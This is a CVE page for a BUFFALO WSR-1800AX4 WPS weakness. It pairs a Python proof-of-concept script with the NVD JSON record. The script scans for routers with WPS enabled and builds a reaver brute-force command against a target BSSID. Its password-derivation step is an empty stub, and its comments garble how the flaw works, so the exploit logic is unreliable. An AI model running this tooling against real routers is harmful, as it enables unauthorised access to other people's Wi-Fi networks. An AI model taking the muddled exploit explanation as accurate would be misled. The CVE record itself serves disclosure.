CVE-2025-46413

# CVE-2025-46413 PoC - BUFFALO WSR-1800AX4 WPS PIN Brute Force # This PoC demonstrates the WPS PIN vulnerability in affected BUFFALO routers # Note: This is for educational and authorized testing purposes only import subprocess import time import re def send_wps_probe(interface, bssid): """ Send WPS probe request to target router """ cmd = f"sudo iw dev {interface} scan | grep -A5 {bssid}" result = subprocess.run(cmd, shell=True, capture_output=True, text=True) return result.stdout def brute_force_wps_pin(target_mac, interface="wlan0"): """ Perform WPS PIN brute force attack on vulnerable BUFFALO router The vulnerability allows rapid enumeration of WPS PIN due to weak hash """ print(f"[*] Starting WPS PIN brute force on target: {target_mac}") print(f"[*] Target: BUFFALO WSR-1800AX4 series") print(f"[*] Vulnerability: CVE-2025-46413 - Insufficient computational effort in password hash") # WPS uses 8-digit PIN, last digit is checksum # Valid PINs range from 00000000 to 99999999 (reduced search space) # Using reaver or bully for WPS attack # The weak hash implementation allows faster PIN enumeration cmd = f"sudo reaver -i {interface} -b {target_mac} -vv -c 1" print(f"[*] Executing: {cmd}") print("[*] Note: Weak hash implementation allows rapid PIN validation") # In real attack scenario, this would execute reaver/bully # subprocess.run(cmd, shell=True) return None def extract_wifi_password(pin): """ Once valid PIN is obtained, derive Wi-Fi password """ print(f"[+] Valid WPS PIN found: {pin}") print("[+] Deriving Wi-Fi password from PIN...") # The weak hash allows quick derivation of PSK from PIN return None def check_wps_status(target_mac, interface="wlan0"): """ Check if WPS is enabled on target router """ cmd = f"sudo wash -i {interface} | grep {target_mac}" result = subprocess.run(cmd, shell=True, capture_output=True, text=True) if "WPS Locked" not in result.stdout: print(f"[!] WPS appears to be enabled on {target_mac}") return True return False if __name__ == "__main__": # Target BUFFALO router MAC address (example) target_bssid = "XX:XX:XX:XX:XX:XX" print("="*60) print("CVE-2025-46413 PoC - BUFFALO WSR-1800AX4 WPS Weak Hash") print("="*60) print("[*] This vulnerability allows attackers to obtain Wi-Fi PIN") print("[*] and password due to insufficient computational effort") print("[*] in password hash processing.") print() # Check WPS status if check_wps_status(target_bssid): print("[+] WPS is enabled - router may be vulnerable") # Execute brute force attack # brute_force_wps_pin(target_bssid) else: print("[-] WPS status could not be determined")

{"cve": {"id": "CVE-2025-46413", "sourceIdentifier": "[email protected]", "published": "2025-11-07T09:15:38.787", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use of password hash with insufficient computational effort issue exists in BUFFALO Wi-Fi router 'WSR-1800AX4 series'. When WPS is enabled, PIN code and/or Wi-Fi password may be obtained by an attacker."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-916"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN13754005/", "source": "[email protected]"}, {"url": "https://www.buffalo.jp/news/detail/20251107-01.html", "source": "[email protected]"}]}}